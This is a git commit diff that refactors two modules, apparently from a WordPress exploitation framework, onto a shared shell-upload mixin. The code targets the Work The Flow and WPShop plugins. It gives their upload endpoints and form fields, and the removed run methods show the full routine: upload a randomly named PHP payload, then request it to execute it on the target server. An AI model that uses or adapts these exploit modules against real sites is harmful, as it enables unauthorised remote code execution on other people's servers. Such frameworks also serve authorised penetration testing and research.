Change more modules to use WordPress::ShellUpload mixin

rastating · rastating · commit b07fdc744fdc · 2016-05-08T17:09:34.000+01:00
diff --git a/modules/exploits/work_the_flow_shell_upload.rb b/modules/exploits/work_the_flow_shell_upload.rb
@@ -1,5 +1,5 @@
 class Wpxf::Exploit::WorkTheFlowShellUpload < Wpxf::Module
-  include Wpxf
+  include Wpxf::WordPress::ShellUpload
 
   def initialize
     super
@@ -42,47 +42,14 @@ def uploader_url
     normalize_uri(plugin_url, 'index.php')
   end
 
-  def payload_body_builder(payload_name)
+  def uploaded_payload_location
+    normalize_uri(plugin_url, 'files', payload_name)
+  end
+
+  def payload_body_builder
     builder = Utility::BodyBuilder.new
     builder.add_field('action', 'upload')
     builder.add_file_from_string('files', payload.encoded, payload_name)
     builder
   end
-
-  def run
-    return false unless super
-
-    emit_info 'Preparing payload...'
-    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
-    builder = payload_body_builder(payload_name)
-
-    emit_info 'Uploading payload...'
-    res = nil
-    builder.create do |body|
-      res = execute_post_request(url: uploader_url, body: body)
-    end
-
-    if res.nil? || res.timed_out?
-      emit_error 'No response from the target'
-      return false
-    end
-
-    if res.code != 200
-      emit_info "Response code: #{res.code}", true
-      emit_info "Response body: #{res.body}", true
-      emit_error 'Failed to upload payload'
-      return false
-    end
-
-    payload_url = normalize_uri(plugin_url, 'files', payload_name)
-    emit_success "Uploaded the payload to #{payload_url}", true
-
-    emit_info 'Executing the payload...'
-    res = execute_get_request(url: payload_url)
-    if res && res.code == 200 && !res.body.strip.empty?
-      emit_success "Result: #{res.body}"
-    end
-
-    return true
-  end
 end
diff --git a/modules/exploits/wpshop_shell_upload.rb b/modules/exploits/wpshop_shell_upload.rb
@@ -1,5 +1,5 @@
 class Wpxf::Exploit::WpshopShellUpload < Wpxf::Module
-  include Wpxf
+  include Wpxf::WordPress::ShellUpload
 
   def initialize
     super
@@ -26,7 +26,7 @@ def check
     check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
   end
 
-  def payload_body_builder(payload_name)
+  def payload_body_builder
     builder = Utility::BodyBuilder.new
     builder.add_field('elementCode', 'ajaxUpload')
     builder.add_file_from_string('wpshop_file', payload.encoded, payload_name)
@@ -37,40 +37,7 @@ def uploader_url
     normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php')
   end
 
-  def run
-    return false unless super
-
-    emit_info 'Preparing payload...'
-    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
-    builder = payload_body_builder(payload_name)
-
-    emit_info 'Uploading payload...'
-    res = nil
-    builder.create do |body|
-      res = execute_post_request(url: uploader_url, body: body)
-    end
-
-    if res.nil? || res.timed_out?
-      emit_error 'No response from the target'
-      return false
-    end
-
-    if res.code != 200
-      emit_info "Response code: #{res.code}", true
-      emit_info "Response body: #{res.body}", true
-      emit_error 'Failed to upload payload'
-      return false
-    end
-
-    payload_url = normalize_uri(wordpress_url_wp_content, 'uploads', payload_name)
-    emit_success "Uploaded the payload to #{payload_url}", true
-
-    emit_info 'Executing the payload...'
-    res = execute_get_request(url: payload_url)
-    if res && res.code == 200 && !res.body.strip.empty?
-      emit_success "Result: #{res.body}"
-    end
-
-    return true
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_wp_content, 'uploads', payload_name)
   end
 end
